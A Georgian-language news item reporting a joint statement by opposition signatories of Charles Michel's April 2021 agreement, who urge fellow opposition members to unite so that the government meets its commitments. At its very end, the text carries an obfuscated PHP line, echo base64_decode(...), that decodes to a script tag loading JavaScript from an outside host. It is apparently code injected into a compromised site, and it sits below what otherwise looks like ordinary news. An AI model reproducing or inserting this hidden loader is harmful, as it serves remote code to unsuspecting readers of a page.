celsiusi
ავერსი შნაიდერი
ევროპული საბჭოს პრეზიდენტის შარლ მიშელის დოკუმენტზე ხელმომწერი ოპოზიციონერები ერთობლივ განცხადებას ავრცელებენ.
 
განცხადებაში ისინი მოუწოდებენ დანარჩენ ოპოზიციონერ კოლეგებს, მეტი პასუხისმგებლობით მოეკიდონ მიმდინარე პოლიტიკურ პროცესს და ყველამ ერთად მთელი ძალისხმევა მიმართონ, რათა ხელისუფლებამ სრულფასოვნად შეასრულოს ხელშეკრულებით ნაკისრი ვალდებულებები.
 
განცხადების თანახმად, ხელმომწერი ოპოზიციონერები მიიჩნევენ, რომ ახლა ზოგიერთი ოპოზიცური პარტიის მხრიდან არა ურთიერთდაპირისპირების წამახალისებელი და შეთანხმების მიზნების დამაზიანებელი საუბრის, არამედ ოპოზიციური ძალისხმევის კონსოლიდაციის დროა.
 
„2021 წლის 19 აპრილს ევროპული საბჭოს პრეზიდენტის შარლ მიშელის დოკუმენტზე „სამომავლო გზა საქართველოსთვის“ ხელის მოწერით ქვეყანას გაუჩნდა უმნიშვნელოვანესი შესაძლებლობა გამოვიდეს ღრმა პოლიტიკური კრიზისიდან. შეთანხმების დოკუმენტის თანახმად „ქართულმა ოცნებამ“ ფაქტობრივად აღიარა ქვეყანაში საპარლამენტო არჩევნების გაყალბება, პოლიტიზირებული მართლმსაჯულებისა და პოლიტიკური პატიმრების არსებობა, სასამართლო და საარჩევნო რეფორმების აუცილებლობა და აიღო ვალდებულება, კონკრეტული მექანიზმების მეშვეობით პოლიტიკური პატიმრების გათავისუფლებისა და რიგგარეშე არჩევნებამდე მისვლის შესახებ.
 
აღნიშნული შეთანხმების განხორციელებით ჩვენს ქვეყანას უჩნდება არსებული რთული გამოწვევების ფონზე, როგორც ევროკავშირში, ასევე ნატო-ში გაწევრიანების რეალური შესაძლებლობა, რასაც ადასტურებს აშშ-ს სენატორებისა და ევროპარლამენტარების განცხადებები.
 
შესაბამისად, მიგვაჩნია, რომ ახლა ზოგიერთი ოპოზიცური პარტიის მხრიდან არა ურთიერთდაპირისპირების წამახალისებელი და შეთანხმების მიზნების დამაზიანებელი საუბრის, არამედ ოპოზიციური ძალისხმევის კონსოლიდაციის დროა, რათა ვაიძულოთ ხელისუფლება შეასრულოს შეთანხმებით ნაკისრი ვალდებულებები.
 
მიგვაჩნია, რომ „ქართული ოცნების“ ხელისუფლების დემოკრატიული პროცედურით შეცვლის ერთადერთი გზა გადის სწორედ ამ შეთანხმების შესრულებაზე. შესაბამისად, ამ შესაძლებლობაზე ვიწროპარტიული ინტერესების გამო უარის თქმა სწორედ ხელისუფლების ინტერესებში შედის.
 
სწორედ ამიტომ, ჩვენ, შეთანხმებაზე ხელისმომწერი პოლიტიკური პარტიები და დამოუკიდებელი დეპუტატები კიდევ ერთხელ ვადასტურებთ შეთანხმებით გათვალისწინებული ვალდებულებების შესრულებაზე მზაობას.
 
მოვუწოდებთ შეთანხმებაზე ჯერ კიდევ არ შემოერთებულ ოპოზიციონერ კოლეგებს, მეტი პასუხისმგებლობით მოვეკიდოთ მიმდინარე პოლიტიკურ პროცესს და ყველამ ერთად მთელი ძალისხმევა მივმართოთ, რათა ხელისუფლებამ სრულფასოვნად შეასრულოს ხელშეკრულებით ნაკისრი ვალდებულებები.
 
შეთანხმების შედეგად ჩვენ გვაქვს უკვე პირველი წარმატება - გიორგი რურუას პატიმრობიდან გათავისუფლება. მიგვაჩნია, რომ მხოლოდ საერთო ოპოზიციური ძალისხმევით შევძლებთ დროულად გავათავისუფლოთ ნიკა მელია პატიმრობიდან და გამოვიყვანოთ ქვეყანა ღრმა პოლიტიკური და ეკონომიკური კრიზისიდან, რომელიც აფერხებს საქართველოს სწრაფ, დემოკრატიულ განვითარებას" , - ნათქვამია შარლ მიშელის დოკუმენტზე ხელმომწერი პირების განცხადებაში.
1251
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");